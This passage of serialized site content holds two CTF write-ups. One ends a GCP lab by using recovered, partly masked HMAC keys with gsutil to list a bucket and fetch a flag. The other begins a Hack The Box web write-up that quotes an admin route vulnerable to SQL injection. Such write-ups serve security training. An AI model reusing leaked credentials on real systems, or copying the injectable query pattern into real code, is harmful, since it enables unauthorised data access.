the following section, we will detail what these keys are and how to use them.",{"type":33,"tag":40,"props":4613,"children":4615},{"id":4614},"gcs-hmac-keys-usage",[4616],{"type":38,"value":4617},"GCS HMAC keys usage",{"type":33,"tag":47,"props":4619,"children":4620},{},[4621],{"type":38,"value":4622},"HMAC (Hash-based Message Authentication Code) keys in Google Cloud Storage (GCS) are an authentication mechanism that allows applications to access GCS buckets using an HMAC-SHA256 cryptographic signature instead of OAuth2.",{"type":33,"tag":47,"props":4624,"children":4625},{},[4626],{"type":38,"value":4627},"It is often used for the following benefits:",{"type":33,"tag":239,"props":4629,"children":4630},{},[4631,4636,4641],{"type":33,"tag":243,"props":4632,"children":4633},{},[4634],{"type":38,"value":4635},"Compatible with AWS S3 SDKs and tools",{"type":33,"tag":243,"props":4637,"children":4638},{},[4639],{"type":38,"value":4640},"Useful for applications requiring authenticated REST access",{"type":33,"tag":243,"props":4642,"children":4643},{},[4644],{"type":38,"value":4645},"Allows access to GCS with tools that don't support OAuth",{"type":33,"tag":47,"props":4647,"children":4648},{},[4649,4651,4657,4659,4665,4667,4672,4674],{"type":38,"value":4650},"The keys used are arranged in two parts: an ",{"type":33,"tag":105,"props":4652,"children":4654},{"className":4653},[],[4655],{"type":38,"value":4656},"access_key",{"type":38,"value":4658}," and a ",{"type":33,"tag":105,"props":4660,"children":4662},{"className":4661},[],[4663],{"type":38,"value":4664},"secret_key",{"type":38,"value":4666},". The ",{"type":33,"tag":105,"props":4668,"children":4670},{"className":4669},[],[4671],{"type":38,"value":4656},{"type":38,"value":4673}," will have a very specific format, making it easy to recognize as it will begin with: ",{"type":33,"tag":105,"props":4675,"children":4677},{"className":4676},[],[4678],{"type":38,"value":4679},"GOOG....",{"type":33,"tag":47,"props":4681,"children":4682},{},[4683],{"type":38,"value":4684},"It is possible to use these keys with the gsutil command",{"type":33,"tag":114,"props":4686,"children":4687},{"lang":116},[4688],{"type":33,"tag":119,"props":4689,"children":4691},{"className":121,"code":4690,"language":116,"meta":8,"style":8},"$> gsutil config -a\nThis command will configure HMAC credentials, but gsutil will use\nOAuth2 credentials from the Cloud SDK by default. To make sure the\nHMAC credentials are used, run: \"gcloud config set\npass_credentials_to_gsutil false\".\n\nThis command will create a boto config file at /root/.boto containing\nyour credentials, based on your responses to the following questions.\nWhat is your google access key ID? GOOG1E6CZ32****************************************\nWhat is your google secret access key? Hh**************************************\n",[4692],{"type":33,"tag":105,"props":4693,"children":4694},{"__ignoreMap":8},[4695,4720,4771,4833,4869,4886,4893,4946,4997,5043],{"type":33,"tag":128,"props":4696,"children":4697},{"class":130,"line":131},[4698,4702,4706,4711,4715],{"type":33,"tag":128,"props":4699,"children":4700},{"style":135},[4701],{"type":38,"value":3651},{"type":33,"tag":128,"props":4703,"children":4704},{"style":323},[4705],{"type":38,"value":3656},{"type":33,"tag":128,"props":4707,"children":4708},{"style":140},[4709],{"type":38,"value":4710},"gsutil",{"type":33,"tag":128,"props":4712,"children":4713},{"style":140},[4714],{"type":38,"value":181},{"type":33,"tag":128,"props":4716,"children":4717},{"style":151},[4718],{"type":38,"value":4719}," -a\n",{"type":33,"tag":128,"props":4721,"children":4722},{"class":130,"line":362},[4723,4728,4733,4737,4742,4747,4752,4757,4762,4766],{"type":33,"tag":128,"props":4724,"children":4725},{"style":135},[4726],{"type":38,"value":4727},"This",{"type":33,"tag":128,"props":4729,"children":4730},{"style":140},[4731],{"type":38,"value":4732}," command",{"type":33,"tag":128,"props":4734,"children":4735},{"style":140},[4736],{"type":38,"value":3726},{"type":33,"tag":128,"props":4738,"children":4739},{"style":140},[4740],{"type":38,"value":4741}," configure",{"type":33,"tag":128,"props":4743,"children":4744},{"style":140},[4745],{"type":38,"value":4746}," HMAC",{"type":33,"tag":128,"props":4748,"children":4749},{"style":140},[4750],{"type":38,"value":4751}," credentials,",{"type":33,"tag":128,"props":4753,"children":4754},{"style":140},[4755],{"type":38,"value":4756}," but",{"type":33,"tag":128,"props":4758,"children":4759},{"style":140},[4760],{"type":38,"value":4761}," gsutil",{"type":33,"tag":128,"props":4763,"children":4764},{"style":140},[4765],{"type":38,"value":3726},{"type":33,"tag":128,"props":4767,"children":4768},{"style":140},[4769],{"type":38,"value":4770}," use\n",{"type":33,"tag":128,"props":4772,"children":4773},{"class":130,"line":403},[4774,4779,4784,4789,4794,4798,4803,4808,4813,4818,4823,4828],{"type":33,"tag":128,"props":4775,"children":4776},{"style":135},[4777],{"type":38,"value":4778},"OAuth2",{"type":33,"tag":128,"props":4780,"children":4781},{"style":140},[4782],{"type":38,"value":4783}," credentials",{"type":33,"tag":128,"props":4785,"children":4786},{"style":140},[4787],{"type":38,"value":4788}," from",{"type":33,"tag":128,"props":4790,"children":4791},{"style":140},[4792],{"type":38,"value":4793}," the",{"type":33,"tag":128,"props":4795,"children":4796},{"style":140},[4797],{"type":38,"value":3990},{"type":33,"tag":128,"props":4799,"children":4800},{"style":140},[4801],{"type":38,"value":4802}," SDK",{"type":33,"tag":128,"props":4804,"children":4805},{"style":140},[4806],{"type":38,"value":4807}," by",{"type":33,"tag":128,"props":4809,"children":4810},{"style":140},[4811],{"type":38,"value":4812}," default.",{"type":33,"tag":128,"props":4814,"children":4815},{"style":140},[4816],{"type":38,"value":4817}," To",{"type":33,"tag":128,"props":4819,"children":4820},{"style":140},[4821],{"type":38,"value":4822}," make",{"type":33,"tag":128,"props":4824,"children":4825},{"style":140},[4826],{"type":38,"value":4827}," sure",{"type":33,"tag":128,"props":4829,"children":4830},{"style":140},[4831],{"type":38,"value":4832}," the\n",{"type":33,"tag":128,"props":4834,"children":4835},{"class":130,"line":739},[4836,4841,4845,4850,4855,4860,4864],{"type":33,"tag":128,"props":4837,"children":4838},{"style":135},[4839],{"type":38,"value":4840},"HMAC",{"type":33,"tag":128,"props":4842,"children":4843},{"style":140},[4844],{"type":38,"value":4783},{"type":33,"tag":128,"props":4846,"children":4847},{"style":140},[4848],{"type":38,"value":4849}," are",{"type":33,"tag":128,"props":4851,"children":4852},{"style":140},[4853],{"type":38,"value":4854}," used,",{"type":33,"tag":128,"props":4856,"children":4857},{"style":140},[4858],{"type":38,"value":4859}," run:",{"type":33,"tag":128,"props":4861,"children":4862},{"style":676},[4863],{"type":38,"value":679},{"type":33,"tag":128,"props":4865,"children":4866},{"style":140},[4867],{"type":38,"value":4868},"gcloud config set\n",{"type":33,"tag":128,"props":4870,"children":4871},{"class":130,"line":765},[4872,4877,4881],{"type":33,"tag":128,"props":4873,"children":4874},{"style":140},[4875],{"type":38,"value":4876},"pass_credentials_to_gsutil false",{"type":33,"tag":128,"props":4878,"children":4879},{"style":676},[4880],{"type":38,"value":669},{"type":33,"tag":128,"props":4882,"children":4883},{"style":140},[4884],{"type":38,"value":4885},".\n",{"type":33,"tag":128,"props":4887,"children":4888},{"class":130,"line":804},[4889],{"type":33,"tag":128,"props":4890,"children":4891},{"emptyLinePlaceholder":896},[4892],{"type":38,"value":899},{"type":33,"tag":128,"props":4894,"children":4895},{"class":130,"line":839},[4896,4900,4904,4908,4913,4917,4922,4926,4931,4936,4941],{"type":33,"tag":128,"props":4897,"children":4898},{"style":135},[4899],{"type":38,"value":4727},{"type":33,"tag":128,"props":4901,"children":4902},{"style":140},[4903],{"type":38,"value":4732},{"type":33,"tag":128,"props":4905,"children":4906},{"style":140},[4907],{"type":38,"value":3726},{"type":33,"tag":128,"props":4909,"children":4910},{"style":140},[4911],{"type":38,"value":4912}," create",{"type":33,"tag":128,"props":4914,"children":4915},{"style":140},[4916],{"type":38,"value":3736},{"type":33,"tag":128,"props":4918,"children":4919},{"style":140},[4920],{"type":38,"value":4921}," boto",{"type":33,"tag":128,"props":4923,"children":4924},{"style":140},[4925],{"type":38,"value":181},{"type":33,"tag":128,"props":4927,"children":4928},{"style":140},[4929],{"type":38,"value":4930}," file",{"type":33,"tag":128,"props":4932,"children":4933},{"style":140},[4934],{"type":38,"value":4935}," at",{"type":33,"tag":128,"props":4937,"children":4938},{"style":140},[4939],{"type":38,"value":4940}," /root/.boto",{"type":33,"tag":128,"props":4942,"children":4943},{"style":140},[4944],{"type":38,"value":4945}," containing\n",{"type":33,"tag":128,"props":4947,"children":4948},{"class":130,"line":848},[4949,4954,4958,4963,4968,4973,4978,4983,4987,4992],{"type":33,"tag":128,"props":4950,"children":4951},{"style":135},[4952],{"type":38,"value":4953},"your",{"type":33,"tag":128,"props":4955,"children":4956},{"style":140},[4957],{"type":38,"value":4751},{"type":33,"tag":128,"props":4959,"children":4960},{"style":140},[4961],{"type":38,"value":4962}," based",{"type":33,"tag":128,"props":4964,"children":4965},{"style":140},[4966],{"type":38,"value":4967}," on",{"type":33,"tag":128,"props":4969,"children":4970},{"style":140},[4971],{"type":38,"value":4972}," your",{"type":33,"tag":128,"props":4974,"children":4975},{"style":140},[4976],{"type":38,"value":4977}," responses",{"type":33,"tag":128,"props":4979,"children":4980},{"style":140},[4981],{"type":38,"value":4982}," to",{"type":33,"tag":128,"props":4984,"children":4985},{"style":140},[4986],{"type":38,"value":4793},{"type":33,"tag":128,"props":4988,"children":4989},{"style":140},[4990],{"type":38,"value":4991}," following",{"type":33,"tag":128,"props":4993,"children":4994},{"style":140},[4995],{"type":38,"value":4996}," questions.\n",{"type":33,"tag":128,"props":4998,"children":4999},{"class":130,"line":976},[5000,5005,5010,5014,5019,5023,5028,5033,5038],{"type":33,"tag":128,"props":5001,"children":5002},{"style":135},[5003],{"type":38,"value":5004},"What",{"type":33,"tag":128,"props":5006,"children":5007},{"style":140},[5008],{"type":38,"value":5009}," is",{"type":33,"tag":128,"props":5011,"children":5012},{"style":140},[5013],{"type":38,"value":4972},{"type":33,"tag":128,"props":5015,"children":5016},{"style":140},[5017],{"type":38,"value":5018}," google",{"type":33,"tag":128,"props":5020,"children":5021},{"style":140},[5022],{"type":38,"value":4512},{"type":33,"tag":128,"props":5024,"children":5025},{"style":140},[5026],{"type":38,"value":5027}," key",{"type":33,"tag":128,"props":5029,"children":5030},{"style":140},[5031],{"type":38,"value":5032}," ID?",{"type":33,"tag":128,"props":5034,"children":5035},{"style":140},[5036],{"type":38,"value":5037}," GOOG1E6CZ32",{"type":33,"tag":128,"props":5039,"children":5040},{"style":151},[5041],{"type":38,"value":5042},"****************************************\n",{"type":33,"tag":128,"props":5044,"children":5045},{"class":130,"line":988},[5046,5050,5054,5058,5062,5067,5071,5076,5081],{"type":33,"tag":128,"props":5047,"children":5048},{"style":135},[5049],{"type":38,"value":5004},{"type":33,"tag":128,"props":5051,"children":5052},{"style":140},[5053],{"type":38,"value":5009},{"type":33,"tag":128,"props":5055,"children":5056},{"style":140},[5057],{"type":38,"value":4972},{"type":33,"tag":128,"props":5059,"children":5060},{"style":140},[5061],{"type":38,"value":5018},{"type":33,"tag":128,"props":5063,"children":5064},{"style":140},[5065],{"type":38,"value":5066}," secret",{"type":33,"tag":128,"props":5068,"children":5069},{"style":140},[5070],{"type":38,"value":4512},{"type":33,"tag":128,"props":5072,"children":5073},{"style":140},[5074],{"type":38,"value":5075}," key?",{"type":33,"tag":128,"props":5077,"children":5078},{"style":140},[5079],{"type":38,"value":5080}," Hh",{"type":33,"tag":128,"props":5082,"children":5083},{"style":151},[5084],{"type":38,"value":5085},"**************************************\n",{"type":33,"tag":47,"props":5087,"children":5088},{},[5089,5091],{"type":38,"value":5090},"Once the keys are imported, it is possible to list the contents of the bucket that was also in the secrets: ",{"type":33,"tag":105,"props":5092,"children":5094},{"className":5093},[],[5095],{"type":38,"value":5096},"gr-stripe",{"type":33,"tag":114,"props":5098,"children":5099},{"lang":116},[5100],{"type":33,"tag":119,"props":5101,"children":5103},{"className":121,"code":5102,"language":116,"meta":8,"style":8},"$> gsutil ls -r gs://gr-stripe\ngs://gr-stripe/flag.txt\ngs://gr-stripe/transfer/:\ngs://gr-stripe/transfer/\ngs://gr-stripe/transfer/stripe-fetch.js\n",[5104],{"type":33,"tag":105,"props":5105,"children":5106},{"__ignoreMap":8},[5107,5136,5144,5152,5160],{"type":33,"tag":128,"props":5108,"children":5109},{"class":130,"line":131},[5110,5114,5118,5122,5127,5131],{"type":33,"tag":128,"props":5111,"children":5112},{"style":135},[5113],{"type":38,"value":3651},{"type":33,"tag":128,"props":5115,"children":5116},{"style":323},[5117],{"type":38,"value":3656},{"type":33,"tag":128,"props":5119,"children":5120},{"style":140},[5121],{"type":38,"value":4710},{"type":33,"tag":128,"props":5123,"children":5124},{"style":140},[5125],{"type":38,"value":5126}," ls",{"type":33,"tag":128,"props":5128,"children":5129},{"style":151},[5130],{"type":38,"value":2992},{"type":33,"tag":128,"props":5132,"children":5133},{"style":140},[5134],{"type":38,"value":5135}," gs://gr-stripe\n",{"type":33,"tag":128,"props":5137,"children":5138},{"class":130,"line":362},[5139],{"type":33,"tag":128,"props":5140,"children":5141},{"style":135},[5142],{"type":38,"value":5143},"gs://gr-stripe/flag.txt\n",{"type":33,"tag":128,"props":5145,"children":5146},{"class":130,"line":403},[5147],{"type":33,"tag":128,"props":5148,"children":5149},{"style":135},[5150],{"type":38,"value":5151},"gs://gr-stripe/transfer/:\n",{"type":33,"tag":128,"props":5153,"children":5154},{"class":130,"line":739},[5155],{"type":33,"tag":128,"props":5156,"children":5157},{"style":135},[5158],{"type":38,"value":5159},"gs://gr-stripe/transfer/\n",{"type":33,"tag":128,"props":5161,"children":5162},{"class":130,"line":765},[5163],{"type":33,"tag":128,"props":5164,"children":5165},{"style":135},[5166],{"type":38,"value":5167},"gs://gr-stripe/transfer/stripe-fetch.js\n",{"type":33,"tag":47,"props":5169,"children":5170},{},[5171,5173,5179],{"type":38,"value":5172},"We can see that we have a file called ",{"type":33,"tag":105,"props":5174,"children":5176},{"className":5175},[],[5177],{"type":38,"value":5178},"flag.txt",{"type":38,"value":5180}," in the bucket, so we can download it using the following command:",{"type":33,"tag":114,"props":5182,"children":5183},{"lang":116},[5184],{"type":33,"tag":119,"props":5185,"children":5187},{"className":121,"code":5186,"language":116,"meta":8,"style":8},"$> gsutil cp gs://gr-stripe/flag.txt .\n",[5188],{"type":33,"tag":105,"props":5189,"children":5190},{"__ignoreMap":8},[5191],{"type":33,"tag":128,"props":5192,"children":5193},{"class":130,"line":131},[5194,5198,5202,5206,5211,5216],{"type":33,"tag":128,"props":5195,"children":5196},{"style":135},[5197],{"type":38,"value":3651},{"type":33,"tag":128,"props":5199,"children":5200},{"style":323},[5201],{"type":38,"value":3656},{"type":33,"tag":128,"props":5203,"children":5204},{"style":140},[5205],{"type":38,"value":4710},{"type":33,"tag":128,"props":5207,"children":5208},{"style":140},[5209],{"type":38,"value":5210}," cp",{"type":33,"tag":128,"props":5212,"children":5213},{"style":140},[5214],{"type":38,"value":5215}," gs://gr-stripe/flag.txt",{"type":33,"tag":128,"props":5217,"children":5218},{"style":140},[5219],{"type":38,"value":5220}," .\n",{"type":33,"tag":47,"props":5222,"children":5223},{},[5224],{"type":38,"value":5225},"And there we have the flag :D",{"type":33,"tag":5227,"props":5228,"children":5229},"style",{},[5230],{"type":38,"value":5231},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":8,"searchDepth":362,"depth":131,"links":5233},[5234,5235,5236,5237,5238,5239],{"id":42,"depth":362,"text":45},{"id":65,"depth":362,"text":68},{"id":448,"depth":362,"text":451},{"id":1810,"depth":362,"text":1813},{"id":2292,"depth":362,"text":2295},{"id":4614,"depth":362,"text":4617},"markdown","content:writeups:pwnedlabs-gcp-challenge.md","content","writeups/pwnedlabs-gcp-challenge.md","writeups/pwnedlabs-gcp-challenge","md",{"_path":5247,"_dir":6,"_draft":7,"_partial":7,"_locale":8,"title":5248,"description":8,"head":5249,"body":5269,"_type":5240,"_id":11489,"_source":5242,"_file":11490,"_stem":11491,"_extension":5245},"/writeups/aurors-archive","Aurors Archive",{"title":5250,"description":5251,"keywords":5252,"slug":5253,"image":5254,"date":5255,"meta":5256},"Aurors Archive [UNINTENDED]","Aurors Archive writeup from Hack The Box - Cyber Apocalypse CTF 2025","web,xss,postgreSQL,RCE","aurors-archive","https://res.cloudinary.com/dmju5zuhr/image/upload/v1743102251/writeups/cyber_apocalypse_2025.webp","2025-03-25",[5257,5259,5261,5262,5263,5265,5266,5267],{"og:description":5258},"Aurors Archive writeup from Hack The Box - Cyber Apocalypse CTF 2025.",{"og:title":5260},"Aurors Archive writeup [UNINTENDED]",{"og:image":5254},{"og:type":21},{"og:url":5264},"https://owalid.com/writeups/aurors-archive",{"description":5258},{"title":5260},{"keywords":5268},"web,xss,postgreSQL,RCE,hackthebox,htb,ctf",{"type":30,"children":5270,"toc":11483},[5271,5275,5279,5284,5296,5301,5306,5490,5496,5501,5506,5510,5515,5519,5524,5903,5908,5914,5927,6246,6251,6368,6380,6384,6389,7224,7229,7324,7336,7507,7512,7516,7521,7526,7531,7725,7730,7734,7739,7858,7862,7866,7871,7991,7996,8429,8434,8600,8605,8609,8614,8619,8625,8630,8816,8829,8834,8863,8868,8873,8931,8943,9032,9061,9066,9928,9941,10215,10220,10225,11463,11475,11479],{"type":33,"tag":34,"props":5272,"children":5273},{"id":5253},[5274],{"type":38,"value":5248},{"type":33,"tag":40,"props":5276,"children":5277},{"id":42},[5278],{"type":38,"value":45},{"type":33,"tag":47,"props":5280,"children":5281},{},[5282],{"type":38,"value":5283},"Batchcraft potions is a hard challenge from the Cyber Apocalypse CTF 2025.",{"type":33,"tag":47,"props":5285,"children":5286},{},[5287,5289,5295],{"type":38,"value":5288},"The goal of this challenge is to have a RCE on the server and read the flag with the binary ",{"type":33,"tag":105,"props":5290,"children":5292},{"className":5291},[],[5293],{"type":38,"value":5294},"/readflag",{"type":38,"value":215},{"type":33,"tag":47,"props":5297,"children":5298},{},[5299],{"type":38,"value":5300},"We can see below the architecture of the challenge:",{"type":33,"tag":75,"props":5302,"children":5305},{"imgSrc":5303,":width":5304},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743102366/writeups/aurors-archive/architecture.webp","330",[],{"type":33,"tag":239,"props":5307,"children":5308},{},[5309,5387,5421,5443,5472],{"type":33,"tag":243,"props":5310,"children":5311},{},[5312,5317,5319],{"type":33,"tag":2302,"props":5313,"children":5314},{},[5315],{"type":38,"value":5316},"User Pages",{"type":38,"value":5318},":\n",{"type":33,"tag":239,"props":5320,"children":5321},{},[5322,5335,5348,5361,5374],{"type":33,"tag":243,"props":5323,"children":5324},{},[5325,5327,5333],{"type":38,"value":5326},"Dashboard (",{"type":33,"tag":105,"props":5328,"children":5330},{"className":5329},[],[5331],{"type":38,"value":5332},"dashboard.html",{"type":38,"value":5334},"): Displays ongoing auctions.",{"type":33,"tag":243,"props":5336,"children":5337},{},[5338,5340,5346],{"type":38,"value":5339},"My Submissions (",{"type":33,"tag":105,"props":5341,"children":5343},{"className":5342},[],[5344],{"type":38,"value":5345},"my_submissions.html",{"type":38,"value":5347},"): Lists resources submitted by the user.",{"type":33,"tag":243,"props":5349,"children":5350},{},[5351,5353,5359],{"type":38,"value":5352},"My Bids (",{"type":33,"tag":105,"props":5354,"children":5356},{"className":5355},[],[5357],{"type":38,"value":5358},"my_bids.html",{"type":38,"value":5360},"): Lists auctions where the user has placed bids.",{"type":33,"tag":243,"props":5362,"children":5363},{},[5364,5366,5372],{"type":38,"value":5365},"Submit Resource (",{"type":33,"tag":105,"props":5367,"children":5369},{"className":5368},[],[5370],{"type":38,"value":5371},"submit.html",{"type":38,"value":5373},"): Allows submission of a new resource.",{"type":33,"tag":243,"props":5375,"children":5376},{},[5377,5379,5385],{"type":38,"value":5378},"Auction Details (",{"type":33,"tag":105,"props":5380,"children":5382},{"className":5381},[],[5383],{"type":38,"value":5384},"auction_details.html",{"type":38,"value":5386},"): Displays details of a specific auction.",{"type":33,"tag":243,"props":5388,"children":5389},{},[5390,5402,5403],{"type":33,"tag":2302,"props":5391,"children":5392},{},[5393,5395,5401],{"type":38,"value":5394},"REST API (",{"type":33,"tag":105,"props":5396,"children":5398},{"className":5397},[],[5399],{"type":38,"value":5400},"routes/api.js",{"type":38,"value":2966},{"type":38,"value":5318},{"type":33,"tag":239,"props":5404,"children":5405},{},[5406,5411,5416],{"type":33,"tag":243,"props":5407,"children":5408},{},[5409],{"type":38,"value":5410},"Authentication (login, OAuth).",{"type":33,"tag":243,"props":5412,"children":5413},{},[5414],{"type":38,"value":5415},"Management of submissions, auctions and bids.",{"type":33,"tag":243,"props":5417,"children":5418},{},[5419],{"type":38,"value":5420},"Integration with a Puppeteer bot to visit submitted URLs.",{"type":33,"tag":243,"props":5422,"children":5423},{},[5424,5429,5430],{"type":33,"tag":2302,"props":5425,"children":5426},{},[5427],{"type":38,"value":5428},"Database (db.js)",{"type":38,"value":5318},{"type":33,"tag":239,"props":5431,"children":5432},{},[5433,5438],{"type":33,"tag":243,"props":5434,"children":5435},{},[5436],{"type":38,"value":5437},"PostgreSQL is used to store users, submissions, auctions and bids.",{"type":33,"tag":243,"props":5439,"children":5440},{},[5441],{"type":38,"value":5442},"Functions allow creating, reading, updating and deleting data.",{"type":33,"tag":243,"props":5444,"children":5445},{},[5446,5458,5459],{"type":33,"tag":2302,"props":5447,"children":5448},{},[5449,5451,5457],{"type":38,"value":5450},"Admin Panel (",{"type":33,"tag":105,"props":5452,"children":5454},{"className":5453},[],[5455],{"type":38,"value":5456},"admin.html",{"type":38,"value":2966},{"type":38,"value":5318},{"type":33,"tag":239,"props":5460,"children":5461},{},[5462,5467],{"type":33,"tag":243,"props":5463,"children":5464},{},[5465],{"type":38,"value":5466},"Accessible only by the \"admin\" user.",{"type":33,"tag":243,"props":5468,"children":5469},{},[5470],{"type":38,"value":5471},"Allows viewing database tables.",{"type":33,"tag":243,"props":5473,"children":5474},{},[5475,5480,5482],{"type":33,"tag":2302,"props":5476,"children":5477},{},[5478],{"type":38,"value":5479},"Bot Puppeteer",{"type":38,"value":5481}," :\n",{"type":33,"tag":239,"props":5483,"children":5484},{},[5485],{"type":33,"tag":243,"props":5486,"children":5487},{},[5488],{"type":38,"value":5489},"Logs in as administrator to the site and visits submitted URLs to verify their content.",{"type":33,"tag":40,"props":5491,"children":5493},{"id":5492},"admin-part",[5494],{"type":38,"value":5495},"Admin part",{"type":33,"tag":47,"props":5497,"children":5498},{},[5499],{"type":38,"value":5500},"We will see on this section the admin part of the website. We can change the password of the admin in the source code to better understand the challenge.",{"type":33,"tag":47,"props":5502,"children":5503},{},[5504],{"type":38,"value":5505},"We can see that once authenticated as admin, we have access to the admin section, where it is possible to read the database information.",{"type":33,"tag":75,"props":5507,"children":5509},{"imgSrc":5508},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743102572/writeups/aurors-archive/admin_preview.webp",[],{"type":33,"tag":47,"props":5511,"children":5512},{},[5513],{"type":38,"value":5514},"We can quickly see that the password field in the users table is not encrypted:",{"type":33,"tag":75,"props":5516,"children":5518},{"imgSrc":5517},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743102572/writeups/aurors-archive/users_table.webp",[],{"type":33,"tag":47,"props":5520,"children":5521},{},[5522],{"type":38,"value":5523},"Additionally, we can see in the route that retrieves the database information that there is an SQL injection present, we will examine this in the next section:",{"type":33,"tag":114,"props":5525,"children":5527},{"lang":5526},"js",[5528],{"type":33,"tag":119,"props":5529,"children":5532},{"className":5530,"code":5531,"language":5526,"meta":8,"style":8},"language-js shiki shiki-themes vitesse-dark","// New Endpoint: Get all records from a specified table (POST version)\nrouter.post(\"/table\", isAdmin, async (req, res) => {\n const { tableName } = req.body;\n try {\n const query = `SELECT * FROM \"${tableName}\"`;\n\n [..SNIP...]\n\n const results = await runReadOnlyQuery(query);\n res.json({ success: true, results });\n }\n [..SNIP...]\n \n});\n",[5533],{"type":33,"tag":105,"props":5534,"children":5535},{"__ignoreMap":8},[5536,5545,5630,5677,5689,5744,5751,5769,5776,5816,5864,5871,5887,5895],{"type":33,"tag":128,"props":5537,"children":5538},{"class":130,"line":131},[5539],{"type":33,"tag":128,"props":5540,"children":5542},{"style":5541},"--shiki-default:#758575DD",[5543],{"type":38,"value":5544},"// New Endpoint: Get all records from a specified table (POST version)\n",{"type":33,"tag":128,"props":5546,"children":5547},{"class":130,"line":362},[5548,5553,5557,5562,5567,5571,5576,5580,5585,5590,5594,5599,5603,5608,5612,5617,5621,5626],{"type":33,"tag":128,"props":5549,"children":5550},{"style":306},[5551],{"type":38,"value":5552},"router",{"type":33,"tag":128,"props":5554,"children":5555},{"style":312},[5556],{"type":38,"value":215},{"type":33,"tag":128,"props":5558,"children":5559},{"style":135},[5560],{"type":38,"value":5561},"post",{"type":33,"tag":128,"props":5563,"children":5564},{"style":312},[5565],{"type":38,"value":5566},"(",{"type":33,"tag":128,"props":5568,"children":5569},{"style":676},[5570],{"type":38,"value":669},{"type":33,"tag":128,"props":5572,"children":5573},{"style":140},[5574],{"type":38,"value":5575},"/table",{"type":33,"tag":128,"props":5577,"children":5578},{"style":676},[5579],{"type":38,"value":669},{"type":33,"tag":128,"props":5581,"children":5582},{"style":312},[5583],{"type":38,"value":5584},",",{"type":33,"tag":128,"props":5586,"children":5587},{"style":306},[5588],{"type":38,"value":5589}," isAdmin",{"type":33,"tag":128,"props":5591,"children":5592},{"style":312},[5593],{"type":38,"value":5584},{"type":33,"tag":128,"props":5595,"children":5596},{"style":300},[5597],{"type":38,"value":5598}," async",{"type":33,"tag":128,"props":5600,"children":5601},{"style":312},[5602],{"type":38,"value":2852},{"type":33,"tag":128,"props":5604,"children":5605},{"style":306},[5606],{"type":38,"value":5607},"req",{"type":33,"tag":128,"props":5609,"children":5610},{"style":312},[5611],{"type":38,"value":5584},{"type":33,"tag":128,"props":5613,"children":5614},{"style":306},[5615],{"type":38,"value":5616}," res",{"type":33,"tag":128,"props":5618,"children":5619},{"style":312},[5620],{"type":38,"value":2966},{"type":33,"tag":128,"props":5622,"children":5623},{"style":312},[5624],{"type":38,"value":5625}," =>",{"type":33,"tag":128,"props":5627,"children":5628},{"style":312},[5629],{"type":38,"value":762},{"type":33,"tag":128,"props":5631,"children":5632},{"class":130,"line":403},[5633,5638,5643,5648,5653,5658,5663,5667,5672],{"type":33,"tag":128,"props":5634,"children":5635},{"style":300},[5636],{"type":38,"value":5637}," const",{"type":33,"tag":128,"props":5639,"children":5640},{"style":312},[5641],{"type":38,"value":5642}," {",{"type":33,"tag":128,"props":5644,"children":5645},{"style":306},[5646],{"type":38,"value":5647}," tableName",{"type":33,"tag":128,"props":5649,"children":5650},{"style":312},[5651],{"type":38,"value":5652}," }",{"type":33,"tag":128,"props":5654,"children":5655},{"style":312},[5656],{"type":38,"value":5657}," =",{"type":33,"tag":128,"props":5659,"children":5660},{"style":306},[5661],{"type":38,"value":5662}," req",{"type":33,"tag":128,"props":5664,"children":5665},{"style":312},[5666],{"type":38,"value":215},{"type":33,"tag":128,"props":5668,"children":5669},{"style":306},[5670],{"type":38,"value":5671},"body",{"type":33,"tag":128,"props":5673,"children":5674},{"style":312},[5675],{"type":38,"value":5676},";\n",{"type":33,"tag":128,"props":5678,"children":5679},{"class":130,"line":739},[5680,5685],{"type":33,"tag":128,"props":5681,"children":5682},{"style":1576},[5683],{"type":38,"value":5684}," try",{"type":33,"tag":128,"props":5686,"children":5687},{"style":312},[5688],{"type":38,"value":762},{"type":33,"tag":128,"props":5690,"children":5691},{"class":130,"line":765},[5692,5697,5702,5706,5711,5716,5721,5726,5731,5735,5740],{"type":33,"tag":128,"props":5693,"children":5694},{"style":300},[5695],{"type":38,"value":5696}," const",{"type":33,"tag":128,"props":5698,"children":5699},{"style":306},[5700],{"type":38,"value":5701}," query",{"type":33,"tag":128,"props":5703,"children":5704},{"style":312},[5705],{"type":38,"value":5657},{"type":33,"tag":128,"props":5707,"children":5708},{"style":676},[5709],{"type":38,"value":5710}," `",{"type":33,"tag":128,"props":5712,"children":5713},{"style":140},[5714],{"type":38,"value":5715},"SELECT * FROM \"",{"type":33,"tag":128,"props":5717,"children":5718},{"style":1576},[5719],{"type":38,"value":5720},"${",{"type":33,"tag":128,"props":5722,"children":5723},{"style":140},[5724],{"type":38,"value":5725},"tableName",{"type":33,"tag":128,"props":5727,"children":5728},{"style":1576},[5729],{"type":38,"value":5730},"}",{"type":33,"tag":128,"props":5732,"children":5733},{"style":140},[5734],{"type":38,"value":669},{"type":33,"tag":128,"props":5736,"children":5737},{"style":676},[5738],{"type":38,"value":5739},"`",{"type":33,"tag":128,"props":5741,"children":5742},{"style":312},[5743],{"type":38,"value":5676},{"type":33,"tag":128,"props":5745,"children":5746},{"class":130,"line":804},[5747],{"type":33,"tag":128,"props":5748,"children":5749},{"emptyLinePlaceholder":896},[5750],{"type":38,"value":899},{"type":33,"tag":128,"props":5752,"children":5753},{"class":130,"line":839},[5754,5759,5764],{"type":33,"tag":128,"props":5755,"children":5756},{"style":312},[5757],{"type":38,"value":5758}," 